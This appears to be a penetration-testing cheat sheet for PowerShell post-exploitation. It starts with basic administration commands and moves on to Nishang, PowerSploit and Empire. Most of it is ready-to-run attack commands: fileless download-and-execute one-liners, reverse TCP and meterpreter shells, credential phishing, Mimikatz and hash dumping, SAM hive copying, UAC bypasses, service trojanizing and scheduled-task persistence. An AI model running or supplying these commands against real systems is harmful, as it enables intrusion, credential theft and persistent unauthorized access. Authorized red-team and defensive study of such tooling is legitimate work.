In this section we will review different powershell frameworks used to help us with the post-exploitation phase.
Intro to PowerShell
To check the version:
$PSVersionTable.PSVersion
Powershell v1.0: Win XP SP2, 2003 Server SP1, Vista Powershell v2.0: Win 7, Server 2008 R2 Powershell v3.0: Win 8, Server 2012 Powershell v4.0: Win 8.1, Server 2012 R2 Powershell v5.0: Win 10
Change default colors:
$host.ui.RawUI.ForegroundColor = "black" $host.ui.RawUI.BackgroundColor = "white" clear
To compile a ps1 into .exe use ”PowerGUI Pro script editor”
- List hotfixes
Get-HotFix
Equivalent using wmic:
wmic qfe list
- Detect sandboxed environment
Get-wmiobject win32_bios | format-list Name,SerialNumber
- Handling Certificates
To see installed user certificates
Get-ChildItem -Path "Cert:\CurrentUser\My" Get-ChildItem -Path "Cert:\LocalMachine"
Using GUI:
certmgr.msc
To create a self-signed certificate:
$cert = New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname testcert.example.org
- Show system uptime:
Get-CimInstance -ClassName win32_operatingsystem | select csname, lastbootuptime
Some examples of PowerShell Scripts
Capturing a screenshot
Param( [Parameter(Mandatory = $true)][string]$Path ) $FileName = "$env:COMPUTERNAME - $(get-date -f yyyy-MM-dd_HHmmss).bmp" $File = "$Path\$FileName" Add-Type -AssemblyName System.Windows.Forms Add-type -AssemblyName System.Drawing $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen $Width = $Screen.Width $Height = $Screen.Height $Left = $Screen.Left $Top = $Screen.Top $bitmap = New-Object System.Drawing.Bitmap $Width, $Height $graphic = [System.Drawing.Graphics]::FromImage($bitmap) $graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size) $bitmap.Save($File) Write-Output "Screenshot saved to:" Write-Output $File
Source: https://www.pdq.com/blog/capturing-screenshots-with-powershell-and-net/
Nishang Framework
Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.
in kali: /usr/share/nishang
powershell.exe –exec bypass –Command "& {Import-Module 'C:\Users\User\Desktop\temp\Port-Scan.ps1'; Port-Scan –StartAddress 192.168.56.101 –Endaddress 192.168.56.105 –ResolveHost -ScanPort }"
powershell.exe –exec bypass –Command "& {Import-Module 'C:\Users\User\Desktop\temp\Remove-Update.ps1'; Remove-Update KB2534366}"
powershell.exe –exec bypass –Command "& {Import-Module 'C:\Users\User\Desktop\temp\Invoke-CredentialsPhish.ps1'; Invoke-CredentialsPhish}"
powershell.exe –exec bypass –Command "& {Import-Module 'C:\Users\User\Desktop\temp\Get-PassHashes.ps1'; Get-PassHashes}"
Fileless execution with nishang:
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP/Check-VM.ps1'); Check-VM"
Dont work in Windows 7:
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP/winpost/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 443"
In Windows 7:
powershell -ep bypass -command "(New-Object Net.WebClient).DownloadFile('http://$IP/winpost/Invoke-PowerShellTcp.ps1', 'Invoke-PowerShellTcp.ps1'); Import-Module .\Invoke-PowershellTcp.ps1; Invoke-PowershellTcp -IPAddress $LOCALIP -Reverse -Port 443"
Other useful modules:
- Powerpreter
- Out-CHM
- Out-Word
- Out-Excel
- Out-HTA
Powersploit Framework
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP:8000/CodeExecution/Invoke-Shellcode.ps1');\ Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $LOCALIP -Lport 4444 -Force"
IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Recon/Invoke-ReverseDnsLookup.ps1");\ Invoke-ReverseDnsLookup -IpRange $IP/24
IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Exfiltration/Invoke-Mimikatz.ps1");\ Invoke-Mimikatz -DumpCreds
IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Exfiltration/Invoke-NinjaCopy.ps1");\ Invoke-NinjaCopy -Path "C:\Windows\System32\config\SAM" -LocalDestination "C:\Users\master\Desktop\SAM"
Powersploit modules: PowerUP
PowerUp is a PowerShell tool to assist with local privilege escalation on Windows systems. It contains several methods to identify and abuse vulnerable services, as well as DLL hijacking opportunities, vulnerable registry settings, and escalation opportunities. It is part of PowerSploit and resides at https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc. Empire implements PowerUp’s escalation functionality in the privesc/powerup/* modules.
powershell.exe -nop -exec bypass Import-Module .\PowerUp.ps1 Invoke-AllChecks | Out-File -Encoding ASCII checks.txt
Powersploit modules: BypassUAC
import-module .\bypass-uac.ps1
Does not work for Windows Server 2012:
Bypass-UAC -Method UacMethodSysprep
Work for Windows Server 2012:
Bypass-UAC -Method ucmDismMethod Bypass-UAC -Method UacMethodMMC2
More info:
Powersploit modules: Trojanize DLL
See also Msfvenom Payloads Cheat Sheet.
Powersploit modules: Trojanize Windows Service
Write-ServiceBinary [-Name] <String> [-UserName <String>] [-Password <String>] [-LocalGroup <String>] [-Credential <PSCredential>] [-Command <String>] [-Path <String>]
Source: https://powersploit.readthedocs.io/en/latest/Privesc/Write-ServiceBinary/
Empire Framework
Empire is a PowerShell and Python post-exploitation agent
Installation:
git clone https://github.com/EmpireProject/Empire.git cd Empire/ ./setup/install.sh
Usage:
./empire (Empire) > listeners (Empire: listeners) > uselistener http (Empire: listeners/http) > execute (Empire: listeners/http) > launcher powershell powershell -noP -sta -w 1 -enc SQBmACgAJA<REDACTED>QB8AEkARQBYAA== (Empire: listeners/http) >
Copy the generated powershell payload in the Windows target to open a session in Empire:
powershell -noP -sta -w 1 -enc SQBmACgAJAQB8AEkARQBYAA==
To handle agents in Empire:
agents interact $AGENTID rename [old name] [new name]
Advanced modules:
bypassuac http set Listener http run
or disk-less:
usemodule privesc/bypassuac_wscript
For credentials gathering:
mimikatz
Persistence:
usemodule persistence/elevated/schtasks
References:
- https://github.com/EmpireProject/Empire
- https://github.com/EmpireProject/Empire/wiki/Quickstart
- Automating Empire with DeathStar: https://byt3bl33d3r.github.io/automating-the-empire-with-the-death-star-getting-domain-admin-with-a-push-of-a-button.html
WinEnum
A Powershell Privilege Escalation Enumeration Script